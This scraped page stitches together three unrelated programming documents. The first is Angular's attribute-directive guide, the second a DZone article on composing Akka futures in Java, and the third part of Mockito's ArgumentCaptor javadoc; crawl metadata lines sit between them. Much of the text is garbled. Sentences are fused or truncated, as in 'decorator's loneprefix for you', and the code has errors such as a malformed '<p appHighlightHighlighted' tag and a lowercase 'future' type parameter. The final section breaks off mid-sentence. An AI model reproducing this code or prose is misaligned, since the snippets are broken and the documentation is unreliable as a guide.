Structural Directives change the structure of the view. Two examples are NgFor and NgIf. Learn about them in the Structural Directives guide.
Attribute directives are used as attributes of elements. The built-in NgStyle directive in the Template Syntax guide, for example, can change several element styles at the same time.:
<p appHighlight>Highlight me!</p>:
import { Directive } from '@angular/core'; @Directive({ selector: '[appHighlight]' }) export class HighlightDirective { constructor() { } }
The imported
Directive symbol provides the Angular the
@Directive decorator.
The
@Directive decorator's loneprefix for you.
Make sure you do not prefix the
highlightdirective name with
ngbecause:
import { Directive, ElementRef } from '@angular/core'; @Directive({ selector: '[appHighlight]' }) export class HighlightDirective { constructor(el: ElementRef) { el.nativeElement.style.backgroundColor = 'yellow'; } }
The
import statement specifies an additional
ElementRef symbol from the Angular
core library:
You use the
ElementRef.
To use the new
HighlightDirective, add a paragraph (
<p>) element to the template of the root
AppComponent and apply the directive as an attribute.
.
Currently,
appHighlight simply sets an element color. The directive could be more dynamic. It could detect when the user mouses into or out of the element and respond by setting or clearing the highlight color.
Begin by adding
HostListener to the list of imported symbols.
import { Directive, ElementRef, HostListener } from '@angular/core';
Then add two eventhandlers that respond when the mouse enters or leaves, each adorned by the
HostListener decorator.
@HostListener('mouseenter') onMouseEnter() { this.highlight('yellow'); } @HostListener('mouseleave') onMouseLeave() { this.highlight(null); } private highlight(color: string) { this.el.nativeElement.style.backgroundColor = color; }
The
@HostListener decorator lets you subscribe to events of the DOM element that hosts an attribute directive, the
<p> in this case.
Of course you could reach into the DOM with standard JavaScript host DOM element,
el.
The helper method,
highlight, was extracted from the constructor. The revised constructor simply declares the injected
el: ElementRef.
constructor(private el: ElementRef) { }
Here's the updated directive in full:
import { Directive, ElementRef, HostListener } from '@angular/core'; @Directive({ selector: '[appHighlight]' }) export class HighlightDirective { constructor(private el: ElementRef) { } @HostListener('mouseenter') onMouseEnter() { this.highlight('yellow'); } @HostListener('mouseleave') onMouseLeave() { this.highlight(null); } private highlight(color: string) { this.el.nativeElement.style.backgroundColor = color; }
Run the app and confirm that the background color appears when the mouse hovers over the
p and disappears as it moves out.
@Inputdata binding
Currently the highlight color is hard-coded within the directive. That's inflexible. In this section, you give the developer the power to set the highlight color while applying the directive.
Begin by adding
Input to the list of symbols imported from
@angular/core.
import { Directive, ElementRef, HostListener, Input } from '@angular/core';
Add a
highlightColor property to the directive class like this:
@Input() highlightColor: string;
@Inputproperty
Notice the
@Input decorator.:
<p appHighlightHighlighted in yellow</p> <p appHighlight [highlightColor]="'orange'">Highlighted in orange</p>
Add a
color property to the
AppComponent.
export class AppComponent { color = 'yellow'; }
Let it control the highlight color with a property binding.
<p appHighlight [highlightColor]="color">Highlighted with parent component's color</p>
That's good, but it would be nice to simultaneously apply the directive and set the color in the same attribute like this.
.
@Input() appHighlight: string;
This is disagreeable. The word,
appHighlight, is a terrible property name and it doesn't convey the property's intent.
@Inputalias
Fortunately you can name the directive property whatever you want and alias it for binding purposes.
Restore the original property name and specify the selector as the alias in the argument to
@Input.
@Input('appHighlight') highlightColor: string;
Inside the directive the property is known as
highlightColor. Outside the directive, where you bind to it, it's known as
appHighlight.
You get the best of both worlds: the property name you want and the binding syntax you want:
<p [appHighlight]="color">Highlight me!</p>
Now that you're binding via the alias to the
highlightColor, modify the
onMouseEnter() method to use that property. If someone neglects to bind to
appHighlightColor, highlight the host element in red:
@HostListener('mouseenter') onMouseEnter() { this.highlight(this.highlightColor || 'red'); }
Here's the latest version of the directive class.
import { Directive, ElementRef, HostListener, Input } from '@angular/core'; @Directive({ selector: '[appHighlight]' }) export class HighlightDirective { constructor(private el: ElementRef) { } @Input('appHighlight') highlightColor: string; @HostListener('mouseenter') onMouseEnter() { this.highlight(this.highlightColor || 'red'); } @HostListener('mouseleave') onMouseLeave() { this.highlight(null); } private highlight(color: string) { this.el.nativeElement.style.backgroundColor = color; } }>
Revise the
AppComponent.color so that it has no initial value.
export class AppComponent { color: string; }
Here are the harness and directive in action.:
@Input() defaultColor: string;
Revise the directive's
onMouseEnter so that it first tries to highlight with the
highlightColor, then with the
defaultColor, and falls back to "red" if both properties are undefined.
@HostListener('mouseenter') onMouseEnter() { this.highlight(this.highlightColor || this.defaultColor || 'red'); }
How do you bind to a second property when you're already binding to the [appHighlight]="color" defaultColor="violet"> Highlight me too! </p>
Angular knows that the
defaultColor binding belongs to the
HighlightDirective because you made it public with the
@Input decorator.
Here's how the harness should work when you're done coding.
This page covered how to:
The final source code follows:
import { Component } from '@angular/core'; @Component({ selector: 'app-root', templateUrl: './app.component.html' }) export class AppComponent { color: string; }
> <p [appHighlight]="color" defaultColor="violet"> Highlight me too! </p>
/* tslint:disable:member-ordering */ import { Directive, ElementRef, HostListener, Input } from '@angular/core'; @Directive({ selector: '[appHighlight]' }) export class HighlightDirective { constructor(private el: ElementRef) { } @Input() defaultColor: string; @Input('appHighlight') highlightColor: string; @HostListener('mouseenter') onMouseEnter() { this.highlight(this.highlightColor || this.defaultColor || 'red'); } @HostListener('mouseleave') onMouseLeave() { this.highlight(null); } private highlight(color: string) { this.el.nativeElement.style.backgroundColor = color; } }
import { NgModule } from '@angular/core'; import { BrowserModule } from '@angular/platform-browser'; import { AppComponent } from './app.component'; import { HighlightDirective } from './highlight.directive'; @NgModule({ imports: [ BrowserModule ], declarations: [ AppComponent, HighlightDirective ], bootstrap: [ AppComponent ] }) export class AppModule { }
import { enableProdMode } from '@angular/core'; import { platformBrowserDynamic } from '@angular/platform-browser-dynamic'; import { AppModule } from './app/app.module'; import { environment } from './environments/environment'; if (environment.production) { enableProdMode(); } platformBrowserDynamic().bootstrapModule(AppModule);
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Attribute Directives</title> <base href="/"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <app-root></app-root> </body> </html>
You can also experience and download the .
@Input?
In this demo, the
highlightColor property is an input property of the
HighlightDirective. You've seen it applied without an alias:
@Input() highlightColor: string;
You've seen it with an alias:
@Input('appHighlight') highlightColor: string;
Either way, the
@Input decorator decorator.
But a component or directive shouldn't blindly trust other components and directives. The properties of a component or directive are hidden from binding by default. They are private from an Angular binding perspective. When adorned with the
@Input decorator, decorator.
When it appears in square brackets ([ ]) to the left of the equals (=), the property belongs to some other component or directive; that property must be adorned with the
@Input decorator.
Now apply that reasoning to the following example:
<p [appHighlight]="color">Highlight me!</p>
The
color property in the expression on the right belongs to the template's component. The template and its component trust each other. The
color property doesn't require the
@Input decorator.
The
appHighlight property on the left refers to an aliased property of the
HighlightDirective, not a property of the template's component. There are trust issues. Therefore, the directive property must carry the
@Input decorator.
© 2010–2018 Google, Inc.
Licensed under the Creative Commons Attribution License 4.0. | http://docs.w3cub.com/angular/guide/attribute-directives/ | CC-MAIN-2018-43 | en | refinedweb |
Composing Futures with Akka
Composing Futures with Akka
Join the DZone community and get the full member experience.Join For Free
How do you break a Monolith into Microservices at Scale? This ebook shows strategies and techniques for building scalable and resilient microservices.
Composing Futures provides a way to do two (or more) things at the same time and then wait until they are done. Typically in Java this would be done with a ExecutorService.
It is very often desirable to be able to combine different Futures with each other. Akka provides additional constructs that greatly simplifies some commons uses cases like making parallel remote service calls, collect and map results.
In this article, I will create a simple Java program that explores Akka composing futures. The sample programs works with Akka 2.1.1.
<dependency> <groupid>com.typesafe.akka</groupid> <artifactid>akka-actor_2.10</artifactid> <version>2.1.1</version> </dependency>.
Lets setup a Callable class that does some work and then returns a result. For this example, the work is just to pause for a random amount of time and the result is the amount of time it paused for.
import java.util.concurrent.Callable; public class RandomPause implements Callable<Long> { private Long millisPause; public RandomPause() { millisPause = Math.round(Math.random() * 3000) + 1000; // 1,000 to 4,000 System.out.println(this.toString() + " will pause for " + millisPause + " milliseconds"); } public Long call() throws Exception { Thread.sleep(millisPause); System.out.println(this.toString() + " was paused for " + millisPause + " milliseconds"); return millisPause; } }Akka's Future has several monadic methods that are very similar to the ones used by Scala's collections. These allow you to create 'pipelines' or 'streams' that the result will travel through.
Here is Java app to compose the RandomPause futures.
import static akka.dispatch.Futures.future; import static akka.dispatch.Futures.sequence; import java.util.ArrayList; import java.util.List; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import scala.concurrent.Await; import scala.concurrent.ExecutionContext; import scala.concurrent.Future; import scala.concurrent.duration.Duration; import akka.dispatch.ExecutionContexts; import akka.dispatch.Mapper; public class SimpleFutures { public static void main(String[] args) { ExecutorService executor = Executors.newFixedThreadPool(4); ExecutionContext ec = ExecutionContexts.fromExecutorService(executor); List<future<Long>> futures = new ArrayList<future<Long>>(); System.out.println("Akka Futures says: Adding futures for two random length pauses"); futures.add(future(new RandomPause(), ec)); futures.add(future(new RandomPause(), ec)); System.out.println("Akka Futures says: There are " + futures.size() + " RandomPause's currently running"); // compose a sequence of the futures Future<Iterable<Long>> futuresSequence = sequence(futures, ec); // Find the sum of the odd numbers Future<Long> futureSum = futuresSequence.map( new Mapper<Iterable<Long>, Long>() { public Long apply(Iterable<Long> ints) { long sum = 0; for (Long i : ints) sum += i; return sum; } }, ec); // block until the futures come back futureSum.onSuccess(new PrintResult<Long>(), ec); try { System.out.println("Result :" + Await.result(futureSum, Duration.apply(5, TimeUnit.SECONDS))); } catch (Exception e) { e.printStackTrace(); } executor.shutdown(); } }Explanation:
In order to execute callbacks and operations, Futures need something called an ExecutionContext, which is very similar to a java.util.concurrent.Executor. In the above program, I have provided my own ExecutorService and passed it to factory methods provided by the ExecutionContexts.
Take note of 'sequence' that combines different Futures with each other.
To better explain what happened in the example, Future.sequence is taking the Iterable<Future<Long>> and turning it into a Future<Iterable<Long>>. We can then use map to work with the Iterable<Long> directly, and we aggregate the sum of the Iterable.
Finally, PrintResult simply prints the output of futureSum.
public final class PrintResult<T> extends OnSuccess<T> { @Override public final void onSuccess(T t) { System.out.println("PrintResults says: Total pause was for " + ((Long) t) + " milliseconds"); } }
Output:
Akka Futures says: Adding futures for two random length pauses RandomPause@55e859c0 will pause for 3892 milliseconds RandomPause@5430d082 will pause for 2306 milliseconds Akka Futures says: There are 2 RandomPause's currently running RandomPause@5430d082 was paused for 2306 milliseconds RandomPause@55e859c0 was paused for 3892 milliseconds PrintResults says: Total pause was for 6198 millisecondsNote: Akka Actors are not used in this example.
How do you break a Monolith into Microservices at Scale? This ebook shows strategies and techniques for building scalable and resilient microservices.
Published at DZone with permission of Nishant Chandra , DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/composing-futures-akka | CC-MAIN-2018-43 | en | refinedweb |
Nested Property Index
Overview
An index can be defined on a nested property to improve performance of nested queries - this is highly recommended.
Nested properties indexing uses an additional
[SpaceIndex] attribute -
Path.
The SpaceIndex.Path Attribute
The
Path attribute represents the path of the property within the nested object.
Below is an example of defining an index on a nested property:
[SpaceClass] public class Person { //Properties ... // this defines and Extended index on the PersonalInfo.SocialSecurity property [SpaceIndex(Path = "SocialSecurity", Type = SpaceIndexType.Extended)] public Info PersonalInfo{ get; set; } // ..... } public class Info { public String Name {get; set;} public Address Address {get; set;} public DateTime Birthday {get; set;} public long SocialSecurity {get; set;} public int Id; } public class Address { private int ZipCode {get; set;} private String Street {get; set;} }
[SpaceClass] public class Person { //Properties ... // this defines several indexes on the same personalInfo property [SpaceIndex(Path = "SocialSecurity", Type = SpaceIndexType.Extended)] [SpaceIndex(Path = "Address.ZipCode", type = SpaceIndexType.Basic)}) [SpaceProperty(StorageType = StorageType.Document)] public Info PersonalInfo{ get; set; } // this defines indexes on map keys [SpaceIndex(Path = "Key1", Type = SpaceIndexType.Basic)] [SpaceIndex(Path = "Key2", Type = SpaceIndexType.Basic)] public Dictionary<String, String> Table{ get; set; } }
The following is an example of query code that automatically triggers this index:
SqlQuery<Person> query = new SqlQuery<Person>( "PersonalInfo.SocialSecurity<10000050L and PersonalInfo.SocialSecurity>=10000010");
Nested Objects
By default, nested objects are kept in a binary form inside the space. In order to support nested matching, the relevant property should be stored as document, or as object if it is in an interoperability scenario and it has a corresponding Java class.
Dictionary based Nested Properties
The same indexing techniques above are also applicable to Dictionary-based nested properties, which means that in the example above the
Info and
Address classes could be replaced with a
Dictionary<String,Object>, with the dictionary keys representing the property names. | https://docs.gigaspaces.com/xap/11.0/dev-dotnet/indexing-nested-properties.html | CC-MAIN-2019-30 | en | refinedweb |
How to make Launch Screen only portrait not support other orientations
I need set launch screen only portrait but in other view controller that can support all orientation.Firstly, I try this method: IOS 8 iPad make only Launch Screen portrait only but it can't make other view controllers that support all orientations. How can i do something to fix it?
See also questions close to this topic
- How to fix "Trailing Whitespace Violation" warnings caused by swiftlint in Xcode?
How can we fix the "Trailing Whitespace Violation" warnings caused by swiftlint in my iOS project all in one go? I don't want to manually correct each one of them. Moreover, I don't want to disable these warnings so you can skip that suggestion.
I have been trying Find And Replace option but I am not getting a correct keyword to sort this out.enter image description here
-.
- Figure out where the user taps on SKStoreReviewController
I want to trace out the tap coordinate of where user taps on SKStoreReviewController.requestReview().
Apple displays this in a separate Window that appears on top of my own application and I can access that. How would I track the tap event on the view itself? I tried adding gesture recognizer to the UIWindow that owns SKStoreReview but it's not working.
I tried subclassing UIApplication to my own but that doesn't intercept event sent to SKStoreReviewPresentationWindow either.
- While typing text in the textField the text clips at the left edge in iOS11
In iOS 11 devices the text in the textField clips while typing, however after ending editing it appears properly. My textField is centre aligned to the screen
I tried adding a padding view at the beginning of textField. That did not help
This issue happens when the 'textField.borderStyle = .none', for other border styles it appears properly.
Please check the image in the link of text clipping issue.
- failed to find PDF header: `%PDF' not found iOS, PDFKit
I'm downloading a
PDFKit. most of the time it works properly. for some cases, it gives me an error called
failed to find PDF header: `%PDF' not found
I went through several readings and StackOverflow questions like Question. but still didn't figure out the solution to outcome of this problem. in some articles, it says it is a bug from Apple. isn't it fixed it yet?
here is how I'm downloading the pdf
let destination: DownloadRequest.DownloadFileDestination = { _, _ in let documentsURl = FileManager.default.urls(for: .documentDirectory, in: .userDomainMask)[0] let fileurl = documentsURl.appendingPathComponent(mydocumentname + ".pdf") return (fileurl, [.removePreviousFile, .createIntermediateDirectories]) } Alamofire.download(urlrequest!, to: destination).responseData { (response) in switch response.result { case .success( _): completion(response.destinationURL) case .failure(let err): } }
this works fine in most cases. but fail in some cases with the above error. does anyone know a solution for this? hope your help with this. have a nice day.
- How can I access TableView from the LaunchScreen.storyboard?
I want to access the
tableViewfrom the
launchscreen.storyboard, I'm submitting a name, and when I
initializea new
class
myViewControllerbut in
ViewDidLoad()I can not access it. I'm using VS 2019 for windows connected to mac if that is making some difference.
- Cannot Animate Activity Indicator through Storyboard
I am actually using activity indicator in LaunchScreen
But cannot animate through storyboard using Attributes inspector. | http://quabr.com/56659750/how-to-make-launch-screen-only-portrait-not-support-other-orientations | CC-MAIN-2019-30 | en | refinedweb |
Is there a script to delete all children of an object?
Need this fast…thanks
Is there a script to delete all children of an object?
Need this fast…thanks
import bge
cont=bge.logic.getCurrentController()
own=cont.owner()
if object.children!=None:
for objects in children:
objects.endObject()
import bge cont=bge.logic.getCurrentController() own=cont.owner if own.children!=None: for objects in own.children: objects.endObject()
Ok, but why doe this happen? (press play and press 1,2,3 multiple times)
the guns glitch up…I checked everything and don’t know what’s wrong
I’ll attach a google drive one
Ok, I see this setup and it’s a little hard to handle
I will try and cook you up something less “divided” as it’s hard to tell what is going on.
ok check this out,
this does the exact same thing, but the gun is self contained.
mind you you will have to setup each gun, but it should make it much easier
WeaponSelfContained.blend (460 KB)
I am going to build the full system, as I need the same thing for wrectified,
here is a updated version (all I am doing for tonight)
this manages reloading (R key)
the player can activate firing, but firing is in the gun
the player activates reloading but reloading is in the gun
the player gun swichty system removes the ammo, and adds it to stock, then ends the gun
WeaponSelfContainedV2.blend (494 KB)
@BluePrintRandom, there is an EDIT button. We told you multiple times to use it. It is left of the reply button. Even a child is able to find it.
Your subsequent posts are flooding the forum.
It does get a little obnoxious, so I agree with Monster. Still looks good though, BPR. But I bet my dog could find the edit button.
IIRC, you also told him that “objects” is not a proper name when referencing a single object, among other things.
In reading (or trying to read) a number of his posts, I am now convinced that he suffers from a learning disability of some sort. I feel sorry for him, but I don’t think he should be allowed to spam threads, and the forum in general.
PS:
The function that should actually end all children (his code doesn’t deal with children’s children):
def end_children(parent): for c in parent.children: end_children(c) c.endObject()
isn’t that what I’ve already done?
the eyes trigger the gun controller to add the gun, and shooting and reload are in the gun. I just haven’t made reload yet though.
I’ll post a more complete version of what I’ve done…
Oh and there’s an annoying upload problem I’m having…My game is 5MB compressed so every time I want to upload the problem, I have to delete most of the objects, textures and materials to do so…any ideas on how to eliminate this problem?
Mediafire. Or Google Drive. Or Dropbox. Or other.
Off topic:
While I do agree that reading multiple tiny posts can be a hassle, I don’t mind it. I think he’s just using it like a chat
Some posts, like #7 are meant to be just a single post. I kind of don’t like reading one giant post that might take up the whole page
On topic:
The function that should actually end all children (his code doesn’t deal with children’s children):
Doesn’t that already happen automatically? all children are input into the scene if the parent is and deleted when the parent is deleted right?
I would connect this post and the previous one I made, but there’s no “connect” button or something. Just a suggestion…can you guys put one in there? I think it would benefit more people than just me
Oh, yes, of course (my head was stuck in a different engine).
Still, I would recommend you use this code, instead of his:
def end_children(parent): for c in parent.children: c.endObject()
It’s better, due to proper naming, and no redundant checks.
I don’t feel sorry for me, where are your games btw?
back to ON Topic.
this is far less complicated.
his whole system is a mess of states,
this is not.
WeaponSelfContainedLogicV4.blend (497 KB)
Point of information, objects do also have a childrenRecursive attribute, though I suspect you’ve already considered this case, given that ending objects linearly will likely cause reference errors when an object is ended before its children (as you iterate through, unless the attribute traverses bottom up)
Jeez, a little extreme, don’t ya think? All the blatant name callings, and insults…
Sure, he posts a lot (I never noticed until now, tbh) but he’s incredibly helpful.
OT: I have nothing to contribute to this thread, so I’ll be on my way
I would only parent one item to the gun manager ever,
and that way if there is a gun, its own.children[0]
(check my solution)
it uses .02ms->.04ms peak logic
btw you can use the property “Fire” to handle animations fire and reload,
and “Init” can handle “drawing” animation
I’ll need to rethink “gun remove” as it is instant at the moment.
*** Moderation ***
Your complete game is not needed as long as your complete game is not the problem.
I strongly suggest you recreate your problem in a small demonstration .blend.
The benefits:
Drawback:
Unfortunately this is not a chat and we do not want to be one. BluePrintRandom has to follow the forum rules as everybody else here. One rule says: “Don’t flood the forums with … unnecessary posts …”
He knows the solution: edit button
You can edit even your older posts. But if there are other posts already it is better to post a new one, except you want to correct the information of the old post. If you add information I recommend to mark it somehow that a reader knows it was added later.
*** End of Moderation ***
To provide some help on topic (not moderating):
It took me a while to identify the object that execute the deleteChildren.py code. An demonstration .blend as mentioned above would surely be an help. I do not even know how to test this game.
You mention you loop backwards through the code to avoid issues on deleting. This is not the case in this situation as you do not remove elements from the list. You end game objects. This has no influence on the list. The list will stay the same so you are save to loop forward.
Anyway the mentioned code from BluePrintRandom is sufficient (but a little bit too much).
def endChildren(object): for child in object.children: child.endObject()
Attribute children always returns a list. If there is no child the list is empty. You can test this situation.
You can but you do not need to end the “children of the children”. As you already expect the BGE ends objects together with their children. You can test that either.
Do you still have problems? | https://blenderartists.org/t/delete-children/614577 | CC-MAIN-2019-30 | en | refinedweb |
ThemeManager
ThemeManager is a most lightweight, powerful, convenient and easiest way to manage your app themes, and also support change text(e.g. language) or other configurations dynamically too.
Installing ThemeManager
ThemeManager supports CocoaPods and Carthage. ThemeManager is written in Swift.
Github Repo
You can pull the ThemeManager Github Repo and include the ThemeManager.xcodeproj to build a dynamic or static library.
CocoaPods
CocoaPods is a dependency manager for Cocoa projects. For usage and installation instructions, visit their website. To integrate ThemeManager into your Xcode project using CocoaPods, specify it in your
Podfile:
pod 'WYZThemeManager'
Carthage
Carthage is a decentralized dependency manager that builds your dependencies and provides you with binary frameworks. To integrate ThemeManager into your Xcode project using Carthage, specify it in your
Cartfile:
github "azone/ThemeManager" "master"
Swift Package Manager
The Swift Package Manager is a tool for automating the distribution of Swift code and is integrated into the swift compiler. It is in early development, but ThemeManager does support its use on supported platforms.
Once you have your Swift package set up, adding ThemeManager as a dependency is as easy as adding it to the dependencies value of your
Package.swift.
dependencies: [ .package(url: "", from: "0.2.0") ]
Usage
1. implement your self theme, language or other configuration (may be class, struct or anything you want) which must be conform
Theme protocol.
Example:
import ThemeManager struct MyTheme: Theme { var backgroundColor = UIColor.gray var mainColor = UIColor.orange var titleFont = UIFont.preferredFont(forTextStyle: .headline) var subtitleFont = UIFont.preferredFont(forTextStyle: .subheadline) var textColor = UIColor.red var buttonTitleColor = UIColor.orange var buttonTitleHighlightcolor = UIColor.red var title = "Default Theme" }
2. Declare
ThemeManager instance variable with your default theme in the global scope.
Example:
let themeManager = ThemeManager(MyTheme())
3. Put any theme, language or configuration related setups in
setUp method
Example
themeManager.setup(view) { (view, theme) in view.backgroundColor = theme.backgroundColor } themeManager.setup(navigationItem) { (item, theme) in item.title = theme.title } themeManager.setup(navigationController?.navigationBar) { (bar, theme) in bar.tintColor = theme.mainColor bar.barTintColor = theme.backgroundColor }
4. Change another theme, language or configuration with your theme instance:
themeManager.apply(otherTheme)
License
ThemeManager is released under the MIT license. See LICENSE for details.
Github
Help us keep the lights on
Dependencies
Used By
Total: 0 | https://swiftpack.co/package/azone/ThemeManager | CC-MAIN-2019-30 | en | refinedweb |
#include <termios.h>
int tcgetattr(int fildes, struct termios *termios_p);
int tcsetattr(int fildes, int optional_actions, const struct termios *termios_p);
int tcsendbreak(int fildes, int duration);
int tcdrain(int fildes);
int tcflush(int fildes, int queue_selector);
int tcflow(int fildes, int action);
speed_t cfgetospeed(const struct termios *termios_p);
int cfsetospeed(struct termios *termios_p, speed_t speed);
speed_t cfgetispeed(const struct termios *termios_p);
int cfsetispeed(struct termios *termios_p, speed_t speed);
#include <sys/types.h> #include <termios.h>
pid_t tcgetpgrp(int fildes);
int tcsetpgrp(int fildes, pid_t pgid);
pid_t tcgetsid(int fildes);
Many of the functions described here have a termios_p argument that is a pointer to a termios structure (see termios(M)).
The tcsetattr function sets the parameters associated with the terminal (unless support is required from the underlying hardware that is not available) from the termios structure referenced by termios_p, as follows:
Note that an error is not returned if the baud rates specified in
the
c_ispeed and
c_ospeed fields of the
termios structure are not supported by the
hardware. Instead, the baud rates remain unchanged and the other
termios settings are used.
If the terminal is not using asynchronous serial data transmission, the tcsendbreak function sends data to generate a break condition or returns without taking any action.
The tcdrain function waits until all output written to the object referred to by fildes has been transmitted.
The tcflush function discards data written to the object referred to by fildes but not transmitted, or data received but not read, depending on the value of queue_selector:
The input and output baud rates are stored in the termios structure. The values shown in the table are supported. The names in this table are defined in <termios.h>.cfgetospeed gets the output baud rate stored in the termios structure are no longer asserted. Normally, this disconnects the line.
cfgetispeed returns the input baud rate stored in the termios structure pointed to by termios_p.
cfsetispeed sets the input baud rate stored in the termios structure pointed to by termios_p to speed. If the input baud rate is set to zero, the input baud rate is specified by the value of the output baud rate.
Note that these settings take effect only on a successful call to tcsetattr.
Both cfsetispeed and cfsetospeed return a value of zero if successful and -1 to indicate an error. Attempts to set unsupported baud rates are ignored. This refers both to changes to baud rates not supported by the hardware, and to changes setting the input and output baud rates to different values if the hardware does not support this. In order to check whether a call to tcsetattr has successfully set a specified baud rate, call tcgetattr and use cfgetispeed and cfgetospeed to check the current settings.
tcgetpgrp returns the foreground process group ID of the terminal specified by fildes. tcgetpgrp is allowed from a process that is a member of a background process group; however, the information may be subsequently changed by a process that is a member of a foreground process group.
If there is no foreground process group, tcgetpgrp returns a value greater than 1 that does not match the process group ID of any existing process group.
On success, tcgetsid returns the session ID associated with the specified terminal. On failure, tcgetsid returns -1 and sets errno to identify the error.
On success, cfgetispeed returns the input baud rate from the termios structure.
On success, cfgetospeed returns the output baud rate from the termios structure.
On success, all other functions return 0. On failure, they return
-1 and set errno to identify the error. | http://osr507doc.xinuos.com/en/man/html.S/termios.S.html | CC-MAIN-2019-30 | en | refinedweb |
#include <CGAL/Filtered_predicate.h>
Filtered_predicate is an adaptor for predicate function objects that allows one to produce efficient and exact predicates.
It is used to build
CGAL::Filtered_kernel<CK> and can be used for other predicates too.
EP is the exact but supposedly slow predicate that is able to evaluate the predicate correctly. It will be called only when the filtering predicate,
FP, cannot compute the correct result. This failure of
FP must be done by throwing an exception.
To convert the geometric objects that are the arguments of the predicate, we use the function objects
C2E and
C2F, which must be of the form
Cartesian_converter or
Homogeneous_converter.
Example
The following example defines an efficient and exact version of the orientation predicate over three points using the Cartesian representation with double coordinates and without reference counting (
Simple_cartesian::Point_2). Of course, the orientation predicate can already be found in the kernel, but you can follow this example to filter your own predicates. It uses the fast but inexact predicate based on interval arithmetic for filtering and the slow but exact predicate based on multi-precision floats when the filtering predicate fails.
File Filtered_kernel/Filtered_predicate.cpp
The return type of the function operators.
It must also be the same type as
EP::result_type. | https://doc.cgal.org/4.7/Kernel_23/classCGAL_1_1Filtered__predicate.html | CC-MAIN-2019-30 | en | refinedweb |
import "github.com/sqp/godock/services/NetActivity"
Package NetActivity is a monitoring, upload and download applet for Cairo-Dock.
Improvements since original DropToShare version:
Not using temp files. Many new upload sites. Code simple and maintainable (400 lines for 18 backends).
Dependencies:
xsel or xclip command for clipboard interaction when build without gtk.
Not implemented (yet):
Icon for the applet. More menu options. Save image copy (and display). Custom upload scripts.
const ( // EmblemAction is the position of the "upload in progress" emblem. EmblemAction = cdtype.EmblemTopRight // EmblemDownload is the position of the "download in progress" emblem. EmblemDownload = cdtype.EmblemTopLeft )
NewApplet creates a new applet instance.
type Applet struct { cdtype.AppBase // Applet base and dock connection. // contains filtered or unexported fields }
Applet defines a dock applet.
DownloadVideo downloads the video from url.
Init load user configuration if needed and initialise applet.
UpToShareLastLink gets the link of the last item sent to a one-click hosting service.
UpToShareLinks gets all links of items sent to one-click hosting services.
UpToShareUploadString uploads data to a one-click site: file location or text.
UploadFiles uploads data to a one-click site: file location or text.
Package NetActivity imports 9 packages (graph) and is imported by 1 packages. Updated 2017-11-29. Refresh now. Tools for package owners. | https://godoc.org/github.com/sqp/godock/services/NetActivity | CC-MAIN-2019-30 | en | refinedweb |
import "k8s.io/kubernetes/pkg/kubectl/explain"
explain.go field_lookup.go fields_printer.go fields_printer_builder.go formatter.go model_printer.go recursive_fields_printer.go typename.go
GetTypeName returns the type of a schema.
LookupSchemaForField looks for the schema of a given path in a base schema.
func PrintModel(name string, writer *Formatter, builder fieldsPrinterBuilder, schema proto.Schema, gvk schema.GroupVersionKind) error
PrintModel prints the description of a schema in writer.
func PrintModelDescription(fieldsPath []string, w io.Writer, schema proto.Schema, gvk schema.GroupVersionKind, recursive bool) error
PrintModelDescription prints the description of a specific model or dot path. If recursive, all components nested within the fields of the schema will be printed.
func SplitAndParseResourceRequest(inResource string, mapper meta.RESTMapper) (string, []string, error)
SplitAndParseResourceRequest separates the users input into a model and fields
Formatter helps you write with indentation, and can wrap text as needed.
Indent creates a new Formatter that will indent the code by that much more.
Write writes a string with the indentation set for the Formatter. This is not wrapping text.
WriteWrapped writes a string with the indentation set for the Formatter, and wraps as needed.
Package explain imports 6 packages (graph) and is imported by 13 packages. Updated 2019-05-12. Refresh now. Tools for package owners. | https://godoc.org/k8s.io/kubernetes/pkg/kubectl/explain | CC-MAIN-2019-30 | en | refinedweb |
public class ArgumentCaptor<T> extends Object
Mockito verifies argument values in natural java style: by using an equals() method. This is also the recommended way of matching arguments because it makes tests clean & simple. In some situations though, it is helpful to assert on certain arguments after the actual verification. For example:
Example of capturing varargs:Example of capturing varargs:
ArgumentCaptor<Person> argument = ArgumentCaptor.forClass(Person.class); verify(mock).doSomething(argument.capture()); assertEquals("John", argument.getValue().getName());
//capturing varargs: ArgumentCaptor<Person> varArgs = ArgumentCaptor.forClass(Person.class); verify(mock).varArgMethod(varArgs.capture()); List expected = asList(new Person("John"), new Person("Jane")); assertEquals(expected, varArgs.getAllValues());
Warning: it is recommended to use ArgumentCaptor with verification but not with stubbing. Using ArgumentCaptor with stubbing may decrease test readability because captor is created outside of assert (aka verify or 'then') block. Also it may reduce defect localization because if stubbed method was not called then no argument is captured.
In a way ArgumentCaptor is related to custom argument matchers (see javadoc for
ArgumentMatcher class).
Both techniques can be used for making sure certain arguments were passed to mocks.
However, ArgumentCaptor may be a better fit if:
ArgumentMatcherare usually better for stubbing.
This utility class *doesn't do any type checks*. The generic signatures are only there to avoid casting in your code.
There is an annotation that you might find useful: @
Captor
See the full documentation on Mockito in javadoc for
Mockito class.
Captor
clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
public T capture()
Internally, this method registers a special implementation of an
ArgumentMatcher.
This argument matcher stores the argument value so that you can use it later to perform assertions.
See examples in javadoc for
ArgumentCaptor class.
public T getValue()
getAllValues().
If verified method was called multiple times then this method it returns the latest captured value.
See examples in javadoc for
ArgumentCaptor class.
public List<T> getAllValues()
Example:
Example of capturing varargs:Example of capturing varargs:
mock.doSomething(new Person("John"); mock.doSomething(new Person("Jane"); ArgumentCaptor<Person> peopleCaptor = ArgumentCaptor.forClass(Person.class); verify(mock, times(2)).doSomething(peopleCaptor.capture()); List<Person> capturedPeople = peopleCaptor.getAllValues(); assertEquals("John", capturedPeople.get(0).getName()); assertEquals("Jane", capturedPeople.get(1).getName());
See more examples in javadoc forSee more examples in javadoc for
mock.countPeople(new Person("John"), new Person("Jane"); //vararg method ArgumentCaptor<Person> peopleCaptor = ArgumentCaptor.forClass(Person.class); verify(mock).countPeople(peopleCaptor.capture()); List expected = asList(new Person("John"), new Person("Jane")); assertEquals(expected, peopleCaptor.getAllValues());
ArgumentCaptorclass.
public static <U,S extends U> ArgumentCaptor<U> forClass(Class<S> clazz)
ArgumentCaptor.
Note that an
